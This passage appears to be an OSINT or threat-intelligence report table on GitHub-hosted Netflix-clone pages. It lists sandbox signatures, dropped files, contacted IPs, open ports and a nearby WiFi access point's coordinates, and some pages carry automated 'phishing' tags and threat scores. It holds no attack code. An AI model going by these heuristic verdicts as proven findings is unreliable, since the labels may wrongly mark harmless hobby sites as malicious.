[targetUID: N/A]\n "framework-e01db8c6b4b812fd4a95_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "TarB657.tmp" has type "data"- Location: [%TEMP%\\TarB657.tmp]- [targetUID: 00000000-00003336]\n "commons-5a43ee094dc33438cd19_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "polyfill-4d422db2fe04f10e5523_1_.js" has type "UTF-8 Unicode text with very long lines with LF NEL line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003336]\n "analytics_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39', u'name': u'Drops XML files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 8, u'description': u'"bold.bridge.ufsc_1_.xml" has type "Unknown"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"bold.bridge.ufsc.br" seems to be random\n "cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://bold.bridge.ufsc.br/"\n Pattern match: "http://bold.bridge.ufsc.br"\n Heuristic match: "/*! For license information please see commons-5a43ee094dc33438cd19.js.LICENSE.txt */(window.webpackJsonp=window.webpackJsonp||[]).push([[0],{+Ewk:function(e,t,n){use strict;Object.defineProperty(t,__esModule,{value:!0}),t.default=2.6.3},+RWU:fun"\n Pattern match: "fonts.googleapis.com/css?family=IBM+Plex+Sans:400,400i,700,700i"\n Pattern match: "https://www.google-analytics.com/analytics.js\',\'ga"\n Pattern match: "https://fb.me/react-polyfills"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "www.google-analytics.com},Ge=function(a){switch(a){default:case"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://tagassistant.google.com/"\n Pattern match: "https://stats.g.doubleclick.net/j/collect,ca.U,ca"\n Pattern match: "www.google-analytics.com==a.host&&(a.port||b)==b&&D(a.path,/plugins/)?!0:!1},ne=function(a){var"\n Pattern match: "https://npmjs.org},npm"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://www.google-analytics.com/"\n Pattern match: "https://www.figma.com/file/TE9FUDtlgVQ4FWlAPtTagxQU/Bold-Design-System,fontSize:1,target:_blank,onClick:function(){Object(r.a)(send,event,{eventCategory:Download,eventAction:Figma})}},e.formatMessage({id:resources-figma-download})"\n Pattern match: "C.JgU/0$"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "www.microsoft.com0"\n Pattern match: "fonts.googleapis.com/css?family=IBM+Plex+Sans:400,400i,700,700i,rel:stylesheet"\n Heuristic match: "bold.bridge.ufsc.br"\n Pattern match: "https://www.carbondesignsystem.com/},Ca | 185.199.111.153 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | 5.5.5-10.5.19-MariaDB | 87.248.157.102 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:03:2F:06:53:C3) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.227): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:28:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.144:443 | 188.114.96.0/24 |
| 2023-05-12 02:50:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://priyank-singhal.github.io/Netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a3c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a3c_IESQMMUTEX_0_303"\n "IsoScope_a3c_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_a3c_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_a3c_IE_EarlyTabStart_0x9cc_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2620"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_a3c_ConnHashTable<2620>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2620"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.64.133.15:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"priyank-singhal.github.io"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com" (Indicator: "dir "; File: "Netflix-clone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-1_1_.png" has type "PNG image data 879 x 622 8-bit/color RGBA non-interlaced" and extension "png"\n "TV-1_1_.png" has type "PNG image data 552 x 368 8-bit/color RGBA non-interlaced" and extension "png"\n "laptop1_1_.png" has type "PNG image data 543 x 319 8-bit/color RGBA non-interlaced" and extension "png"\n "tablet1_1_.png" has type "PNG image data 407 x 256 8-bit/color RGBA non-interlaced" and extension "png"\n "netflix-logo_1_.png" has type "PNG image data 624 x 390 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 879 x 622 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "TV-1_1_.png" has type "PNG image data 552 x 368 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "laptop1_1_.png" has type "PNG image data 543 x 319 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tablet1_1_.png" has type "PNG image data 407 x 256 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002620]\n "~DF1AAE1D1A0DC811EA.TMP" has type "data"- Location: [%TEMP%\\~DF1AAE1D1A0DC811EA.TMP]- [targetUID: 00000000-00002620]\n "~DFB75A13F7CAD935C7.TMP" has type "data"- Location: [%TEMP%\\~DFB75A13F7CAD935C7.TMP]- [targetUID: 00000000-00002620]\n "~DF28A2E35052AED525.TMP" has type "data"- Location: [%TEMP%\\~DF28A2E35052AED525.TMP]- [targetUID: 00000000-00002620]\n "netflix-logo_1_.png" has type "PNG image data 624 x 390 8-bit colormap non-interlaced"- [targetUID: N/A]\n "urlref_httpspriyank-singhal.github.ioNetflix-clone" has type "HTML document ASCII text"- [targetUID: N/A]\n "RecoveryStore._D7576B7F-EF99-11ED-90A3-0800270B262D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "_DEBA6268-EF99-11ED-90A3-0800270B262D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D7576B81-EF99-11ED-90A3-0800270B262D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "JS_1_.js" has type "ASCII text"- [targetUID: N/A]\n "XO3IF052.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XO3IF052.txt]- [targetUID: 00000000-00002620]\n "NB24CLUV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NB24CLUV.txt]- [targetUID: 00000000-00002620]\n "0ER7JP6Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0ER7JP6Q.txt]- [targetUID: 00000000-00002620]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "LHDBHEE9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LHDBHEE9.txt]- [targetUID: 00000000-00002620]\n "LNPTPR4U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LNPTPR4U.txt]- [targetUID: 00000000-00002620]\n "JZLNT6U0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JZLNT6U0.txt]- [targetUID: 00000000-00002620]\n "RI3W3NIN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RI3W3NIN.txt]- [targetUID: 00000000-00002620]\n "Netflix-clone_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://priyank-singhal.github.io/Netflix-clone/"\n Pattern match: "https://priyank-singhal.github.io"\n Pattern match: "https://priyank-singhal.github.io/Netflix-clone"\n Pattern match: "Bj.UUVP/0E{@mX+"\n Pattern match: "Wc.TJ/-tB@W;wsq}jP1"\n Pattern match: "https://fontawesome.comFont"\n Pattern match: "https://use.fontawesome.com/releases/v5.8.2/css/all.css"\n Pattern match: "SUIDmicrosoft.com/921644190899231032348364219492031032230MUID24B45D11D74E669036514E1FD6026757microsoft.com/102557439820831110702364235117031032230_EDGE_Vmicrosoft.com/921657439820831110702364235117031032230SRCHDAF=NOFORMmicrosoft.com/1024332378944031085610"\n Pattern match: "SUIDmicrosoft.com/921644190899231032348364219492031032230MUID24B45D11D74E669036514E1FD6026757microsoft.com/102557439820831110702364235117031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD"\n Pattern match: "SUIDmicrosoft.com/921644190899231032348364219492031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mic"\n Pattern match: "921658439820831110702364594492031032230MUID2F3BF18BE4636E1031FDE285E5E76F26msn.com/102558439820831110702364610117031032230"\n Pattern match: "MUIDB24B45D11D74E669036514E1FD6026757ieonline.microsoft.com/921657439820831110702364235117031032230"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025147781772831068457364594492031032230"\n Pattern match: "SUIDMmicrosoft.com/921644190899231032348364219492031032230*SRCHDAF=NOFORMmicrosoft.com/102433237894403 | 185.199.108.153 |
| 2023-05-12 02:51:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://rehmatullah86.github.io/netflix_clone/', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'http://rehmatullah86.github.io/netflix_clone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://rehmatullah86.github.io/netflix_clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d10_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d10_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d10_IESQMMUTEX_0_331"\n "IsoScope_d10_ConnHashTable<3344>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d10_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3344"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_d10_IE_EarlyTabStart_0xa3c_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rehmatullah86.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rehmatullah86.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"1_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "2_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=12 height=638 bps=0 PhotometricIntepretation=RGB orientation=upper-left width=851] baseline precision 8 640x480 components 3" and extension "jpg"\n "4_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "3_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "1_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "2_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=12 height=638 bps=0 PhotometricIntepretation=RGB orientation=upper-left width=851] baseline precision 8 640x480 components 3"- [targetUID: N/A]\n "4_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "3_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003344]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF44244AA0D7A8F1A8.TMP" has type "data"- Location: [%TEMP%\\~DF44244AA0D7A8F1A8.TMP]- [targetUID: 00000000-00003344]\n "~DF6B5AD45135BC9286.TMP" has type "data"- Location: [%TEMP%\\~DF6B5AD45135BC9286.TMP]- [targetUID: 00000000-00003344]\n "~DF53F25271FCD48569.TMP" has type "data"- Location: [%TEMP%\\~DF53F25271FCD48569.TMP]- [targetUID: 00000000-00003344]\n "~DF67619BE54EA421A3.TMP" has type "data"- Location: [%TEMP%\\~DF67619BE54EA421A3.TMP]- [targetUID: 00000000-00003344]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._5DE8AAB1-EF98-11ED-949B-0800270A776F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "style_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_5DE8AAB3-EF98-11ED-949B-0800270A776F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_65F9F98F-EF98-11ED-949B-0800270A776F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "urlref_httprehmatullah86.github.ionetflix_clone" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "QPQVPPEG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QPQVPPEG.txt]- [targetUID: 00000000-00001340]\n "COJ230SP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\COJ230SP.txt]- [targetUID: 00000000-00003344]\n "RI2WUD6Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RI2WUD6Q.txt]- [targetUID: 00000000-00003344]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "netflix_clone_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "ZFBJLHCG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZFBJLHCG.txt]- [targetUID: 00000000-00001340]\n "4E2LE2BZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4E2LE2BZ.txt]- [targetUID: 00000000-00003344]\n "1CLL0762.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1CLL0762.txt]- [targetUID: 00000000-00003344]\n "P6EAY24L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P6EAY24L.txt]- [targetUID: 00000000-00003344]\n "netflix_clone_2_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /netflix_clone/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://rehmatullah86.github.io/netflix_clone/"\n Pattern match: "http://rehmatullah86.github.io"\n Pattern match: "http://rehmatullah86.github.io/netflix_clone"\n Pattern match: "OqC.jAG/4W^Ah\'AtW5"\n Pattern match: "ns.adobe.com/xap/1.0/"\n Pattern match: "SUIDmicrosoft.com/9216272184358431032346201961026331032229MUID17351C7AD92F609239520F74D8636172microsoft.com/1025285433280031110700201978604431032229_EDGE_Vmicrosoft.com/9216285433280031110700202016690431032229SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216272184358431032346201961026331032229MUID17351C7AD92F609239520F74D8636172microsoft.com/1025285433280031110700201978604431032229SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482"\n Pattern match: "SUIDmicrosoft.com/921 | 185.199.108.153 |
| 2023-05-12 02:46:40 | Physical Location | No | Fraudguard | 0 | 0 | 2 | 0 | None | United States, California, San Francisco | 185.199.109.153 |
| 2023-05-12 03:19:17 | Web Framework | No | Web Framework Identifier | 0 | 0 | 3 | 0 | None | jQuery | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
